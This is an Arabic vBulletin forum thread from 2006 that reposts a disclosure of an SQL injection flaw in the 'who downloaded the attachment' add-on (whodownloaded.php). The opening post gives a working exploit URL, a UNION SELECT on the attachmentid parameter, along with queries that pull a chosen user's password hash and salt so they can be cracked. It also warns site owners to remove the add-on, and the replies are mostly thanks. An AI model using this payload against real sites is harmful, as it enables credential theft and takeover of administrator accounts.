تراجع إلى الخلف   :: TRAIDNT FORUM :: > قسم تطوير المنتديات > ركن تطوير منتديات vb3.8.0 > أرشيف تطوير منتديات vb3.0.0
اعادة تحديث هذه الصفحة [ثغره] في هاك من قام بتحميل المرفق whodownloaded.php
التسجيل دعوة أصدقائك البحث مشاركات اليوم أعتبر مشاركات المنتدى مقروءة

أرشيف تطوير منتديات vb3.0.0 :: يمنع منعاً باتا ً .. كتابة أي موضوع يهتم بمشاكل المنتديات (( يمنع وضع نسخ vBulletin ))

[ثغره] في هاك من قام بتحميل المرفق whodownloaded.php

السلام عليكم اقتباس   المشاركة الأصلية أضيفت بواسطة : Qptan بسم الله الرحمن الرحيم السلام عليكم نوع الثغره : SQL Injection نسبه الخطوره : خطره

 
 
LinkBack
  #1  
قديمة 05 - 04 - 2006, 08:22 vBulletin_vb3 غير متواجد حاليآ بالمنتدى
صورة 'vBulletin_vb3' الرمزية
:: عضـــو::
  





vBulletin_vb3 يستحق التميز
افتراضي [ثغره] في هاك من قام بتحميل المرفق whodownloaded.php
السلام عليكم



اقتباس
  المشاركة الأصلية أضيفت بواسطة : Qptan
بسم الله الرحمن الرحيم
السلام عليكم

نوع الثغره :
SQL Injection

نسبه الخطوره :
خطره جدا ً >> في نظري >> وللي يعرف يستغلها بشكل سليم

الملف المصاب :
whodownloaded.php

معلومات عن الثغره :
الثغره هي موجوده في أحد الهاكات اللي تركب على نسخ vBulletin 3.x.x
وعمل الهاك هو : من قام بتحميل المرفق . بحيث انه يطلع لك اسماء الناس اللي حملو المرفق ....

الثغره :
رمز PHP:
http://www.xxx.com/vb/whodownloaded.php?attachmentid=|| 
بيطلع لك خطأ من القاعده

قمت بكتابه إستعلام بسيط يستعلم عن الباسورد :
رمز PHP:
SELECT password FROM user WHERE userid=
بحيث تستبدل القيمه 1 برقم أي عضو

أو
رمز PHP:
SELECT password FROM user WHERE username=admin 
بحيث تستبدل admin بإسم العضو اللي تبي تجيب الهاش حقه

ولو تبي تفكه إستعلم عن السالت بهذا الشكل :
رمز PHP:
SELECT salt FROM user WHERE userid=
وهكذا ...

قريبا بشرح لكم الإستعلام كيف كتبناه بشكل مفصل

راح يكون النتيجه النهائيه :
رمز PHP:
http://www.xxxx.com/vb/whodownloaded.php?attachmentid=-1%20UNION%20SELECT%20password%20FROM%20user%20WHERE%20userid=1 
أهدي الموضوع هذا إلى سعودي و دكتور جرح
و إلى بلاك زيرو و MaN~HaCkErZ

المكتشف : Linux_Drox
/////////////////////////////////////
// lezr.com/vb
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
جميع الحقوق محفوظه لموقع ومنتديات الليزر

تحياتي .

شباب اللي مركب الهاك ينتفه لحد ماينزل الهاك من الموقع ومرقع


توقيع vBulletin_vb3
vBulletin_vB3HotMail.com
قريبا ً إفتتاح vBull3tin.Org
  رقم المشاركة : [ 2 ]
قديمة 05 - 04 - 2006, 09:24 الـصـاعـقـة غير متواجد حاليآ بالمنتدى
:: عضو نشيط ::
 
صورة 'الـصـاعـقـة' الرمزية
 


الـصـاعـقـة مميزالـصـاعـقـة مميزالـصـاعـقـة مميزالـصـاعـقـة مميزالـصـاعـقـة مميز
بيانات موقعي
اسم الموقع: شبكة الصاعقة العربية
اصدار المنتدى: 3.8.7
افتراضي
شكرا على التنبيه

والحمد لله مش مركبة
الـصـاعـقـة
أضفني كصديق
توقيع الـصـاعـقـة
I have four full days from 8 AM to 4 PM in a week, and May be take Extra workshop
 
  رقم المشاركة : [ 3 ]
قديمة 05 - 04 - 2006, 14:22 x_5 غير متواجد حاليآ بالمنتدى
x_5
:: TRAIDNT ::
:: رفيق الدرب ::
 
صورة 'x_5' الرمزية
 


x_5 مبدع بلا حدودx_5 مبدع بلا حدودx_5 مبدع بلا حدودx_5 مبدع بلا حدودx_5 مبدع بلا حدودx_5 مبدع بلا حدودx_5 مبدع بلا حدودx_5 مبدع بلا حدودx_5 مبدع بلا حدودx_5 مبدع بلا حدودx_5 مبدع بلا حدود
بيانات موقعي
اسم الموقع: vbulletin.ae
اصدار المنتدى: :: مجتمع ترايدنت ::
افتراضي
مشكور اخوي
x_5
أضفني كصديق
توقيع x_5
‏​‏​كُنْ فيْ الْحياهْ كَعابر سبيلٍ وَاتْرُكْ وراءكَ كُل أثرِ جَميل
فَما نَحنُ فِيْ الدُنيا إِلَاضُيُوْف وَما عَلى الضيوْفِ إِلَاالرحيل
واحــد مـــ x_5ـــن النـاس ©
 
  رقم المشاركة : [ 4 ]
قديمة 05 - 04 - 2006, 14:35 الصريح جداً غير متواجد حاليآ بالمنتدى
:: عضو نشيط ::
 
صورة 'الصريح جداً' الرمزية
 


الصريح جداً مبدعالصريح جداً مبدعالصريح جداً مبدعالصريح جداً مبدع
بيانات موقعي
اصدار المنتدى: لا أملك منتدى
افتراضي
أخي العزيز الثغرة خطرة مع بعض التطوير
والثغرة عندي من 5 شهور
وهي قوية جدا لذلك لم أنشرها كي لا يعرف الهكر الملف المصاب فيفحصوه
الصريح جداً
أضفني كصديق
توقيع الصريح جداً
Ethical Hacking Community
V99x.Com // EHCommunity.Com
- Computer Engineer
 
  رقم المشاركة : [ 5 ]
قديمة 05 - 04 - 2006, 15:21 الكنترول غير متواجد حاليآ بالمنتدى
.:: عضو متألق ::.
 
صورة 'الكنترول' الرمزية
 


الكنترول مبدع بلا حدودالكنترول مبدع بلا حدودالكنترول مبدع بلا حدودالكنترول مبدع بلا حدودالكنترول مبدع بلا حدودالكنترول مبدع بلا حدودالكنترول مبدع بلا حدودالكنترول مبدع بلا حدودالكنترول مبدع بلا حدودالكنترول مبدع بلا حدودالكنترول مبدع بلا حدود
بيانات موقعي
اصدار المنتدى: :: مجتمع ترايدنت ::
افتراضي
الله يحفظك يا الغالي و يرحم والديك
الكنترول
أضفني كصديق
توقيع الكنترول
صلاح المصراتي لتصميم المواقع وبرمجتها :-
للإستشارات البرمجية والفنية والحماية إتصل بهاتفي الشخصي
من داخل ليبيا : 0928519021
من خارج ليبيا : 00218928519021


  • لـمراسلتي بريدياً فقط
  • واعذروني لا أستخدم الماسنجر للسوالف والكلام الزايد ...!


لاتسهر الليل إذ كنت تخاف الظلام ووحشته
 
  رقم المشاركة : [ 6 ]
قديمة 05 - 04 - 2006, 17:27 sky4web غير متواجد حاليآ بالمنتدى
:: عضو نشيط ::
 
صورة 'sky4web' الرمزية
 


sky4web يستحق التميزsky4web يستحق التميز
افتراضي
ثغره خطيره في هاك من قام بتحميل المرفق ..
sky4web
أضفني كصديق
توقيع sky4web
سبحان الله وبحمده سبحان الله العظيم
 
  رقم المشاركة : [ 7 ]
قديمة 06 - 04 - 2006, 15:08 AraUnIoN.NeT غير متواجد حاليآ بالمنتدى
Banned
 


AraUnIoN.NeT يستحق التميز
افتراضي
يعطيك العافية اخوي
AraUnIoN.NeT
أضفني كصديق
 
 

العلامات المرجعية

« الموضوع السابق | الموضوع التالي »
أدوات الموضوع
طرق العرض
العرض العادي العرض العادي

ضوابط المشاركة
لا يمكنك اضافة مواضيع جديدة
لا يمكنك اضافة مشاركات
لا يمكنك اضافة مرفقات
لا يمكنك تعديل مشاركاتك
رمز [IMG] : متاحة
رمز HTML : معطّلة
المراجع : معطّلة
Refbacks are متاحة



الساعة معتمدة بتوقيت جرينتش +3 . الساعة الآن : 01:56.
المعهد غير مسؤول عن أي اتفاق تجاري أو تعاوني بين الأعضاء
فعلى كل شخص تحمل مسئولية نفسه إتجاه مايقوم به من بيع وشراء وإتفاق وأعطاء معلومات موقعه
التعليقات المنشورة لا تعبر عن رأي معهد ترايدنت ولا نتحمل أي مسؤولية قانونية حيال ذلك (ويتحمل كاتبها مسؤولية النشر)

إتصل بنا - :: TRAIDNT :: - الأرشيف - Privacy-Policy - اعلى

Powered by vBulletin® Version 3.8.7
.Copyright ©2000 - 2012, Jelsoft Enterprises Ltd

SEO by vBSEO 3.6.0 ©2011, Crawlability, Inc.